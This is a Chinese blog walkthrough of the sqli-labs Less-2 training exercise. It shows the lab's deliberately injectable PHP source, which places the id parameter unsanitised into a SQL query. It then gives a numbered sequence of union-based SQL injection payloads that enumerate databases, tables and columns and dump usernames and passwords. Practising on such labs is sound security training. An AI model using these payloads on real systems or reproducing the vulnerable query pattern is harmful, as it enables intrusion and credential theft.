贴上源代码:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-2 **Error Based- Intiger**</title>
</head>
<body bgcolor="#000000">
<div style=" margin-top:60px;color:#FFF; font-size:23px; text-align:center">Welcome <font color="#FF0000"> Dhakkan </font><br>
<font size="3" color="#FFFF00">
<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);
// take the variables
if(isset($_GET['id']))
{
$id=$_GET['id'];
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'ID:'.$id."\n");
fclose($fp);
// connectivity
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
echo "<font size='5' color= '#99FF00'>";
echo 'Your Login name:'. $row['username'];
echo "<br>";
echo 'Your Password:' .$row['password'];
echo "</font>";
}
else
{
echo '<font color= "#FFFF00">';
print_r(mysql_error());
echo "</font>";
}
}
else
{
echo "Please input the ID as parameter with numeric value";
}
?>
</font> </div></br></br></br><center>
<img src="../images/Less-2.jpg" /></center>
</body>
</html>
?id=1(正常)
?id=1 and 1=1(正常)
?id=1 and 1=2 (报错,是数字型报错注入)
?id=1 order by 3(正常)
?id=1 order by 4(报错)
?id=-1 union select 1,2,3(返回2,3)
?id=-1 union select 1,2,database()(查看当前数据库)
?id=-1 union select 1,2,group_concat(schema_name) from information_schema.schemata(查看所有数据库名)
?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()(查看表名)
?id=-1 union select 1,database(),group_concat(column_name) from information_schema.columns where table_name='users'(查看列名)
?id=-1 union select 1,database(),group_concat(id,username,password) from users(拿数据)
4229
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
